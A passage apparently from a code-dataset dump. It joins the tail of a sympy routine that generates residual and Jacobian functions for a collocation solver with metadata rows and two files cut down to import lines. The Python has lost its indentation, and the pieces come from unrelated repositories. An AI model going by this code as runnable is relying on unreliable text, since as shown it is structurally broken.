fsym = [[sympy.Symbol(f"f[{i},{n}]") for n in range(N)] for i in range(s)]
# polynomial approximation of the numerical solution at the collocation points
xc = [
[
(x[n], osym[n] - sum(asym[i][j] * fsym[j][n] for j in range(s)))
for n in range(N)
]
for i in range(s)
]
# expressions for the residuals vector
residuals = [
fsym[i][n] + xdot[n].subs(xc[i]) for i in range(s) for n in range(N)
] + [c.subs(xc[i]) for c in constraints for i in range(s)]
# expressions for the Jacobian matrix
jacobian = [[residual.diff(d) for r in fsym for d in r] for residual in residuals]
printer = sympy.printing.lambdarepr.PythonCodePrinter()
dim = s * N + s * len(constraints)
code = "def compute_residuals(residuals, f, o):\n"
code += f"\tf = f.view()\n\tf.shape = ({s}, {N})\n"
code += "".join(f"\ta{i}{j} = {a[i,j]}\n" for i in range(s) for j in range(s))
# code += "".join(f"\t{symbol} = {printer.doprint(value)}\n" for symbol, value in params.items())
for i in range(dim):
code += f"\tresiduals[{i}] = {printer.doprint(eval_expr(residuals[i], params=params).evalf())}\n"
# code += f"\tresiduals[{i}] = {printer.doprint(residuals[i])}\n"
code += "\n\ndef compute_jacobian(jacobian, f, o):\n"
code += f"\tf = f.view()\n\tf.shape = ({s}, {N})\n"
code += "".join(f"\ta{i}{j} = {a[i,j]}\n" for i in range(s) for j in range(s))
# code += "".join(f"\t{symbol} = {printer.doprint(value)}\n" for symbol, value in params.items())
for i in range(dim):
for j in range(s * N):
code += f"\tjacobian[{i},{j}] = {printer.doprint(eval_expr(jacobian[i][j], params=params).evalf())}\n"
# code += f"\tjacobian[{i},{j}] = {printer.doprint(jacobian[i][j])}\n"
return code
| 31.459459 | 114 | 0.593643 |
fee2dd08a38899ceea87863c92dafc29503606c4 | 525 | py | Python | feeds/rss_feed.py | godwinaden/movie_api_server | 1b467bd91d0a5a9a2f0a2a9fc921b3a4f5c04217 | [
"MIT"
] | null | null | null | feeds/rss_feed.py | godwinaden/movie_api_server | 1b467bd91d0a5a9a2f0a2a9fc921b3a4f5c04217 | [
"MIT"
] | null | null | null | feeds/rss_feed.py | godwinaden/movie_api_server | 1b467bd91d0a5a9a2f0a2a9fc921b3a4f5c04217 | [
"MIT"
] | null | null | null | from sql_app.repositories.movie_repository import MovieRepo
from feedgenerator import RssFeed
from sqlalchemy.orm import Session
| 20.192308 | 59 | 0.704762 |
fee307cf09fb64ad8f6da891a9a28954c9a3eeae | 3,026 | py | Python | teraserver/python/opentera/db/models/TeraDeviceParticipant.py | introlab/opentera | bfc4de672c9de40b7c9a659be2138731e7ee4e94 | [
"Apache-2.0"
] | 10 | 2020-03-16T14:46:06.000Z | 2022-02-11T16:07:38.000Z | teraserver/python/opentera/db/models/TeraDeviceParticipant.py | introlab/opentera | bfc4de672c9de40b7c9a659be2138731e7ee4e94 | [
"Apache-2.0"
] | 114 | 2019-09-16T13:02:50.000Z | 2022-03-22T19:17:36.000Z | teraserver/python/opentera/db/models/TeraDeviceParticipant.py | introlab/opentera | bfc4de672c9de40b7c9a659be2138731e7ee4e94 | [
"Apache-2.0"
] | null | null | null | from opentera.db.Base import db, BaseModel
| 44.5 | 114 | 0.718771 |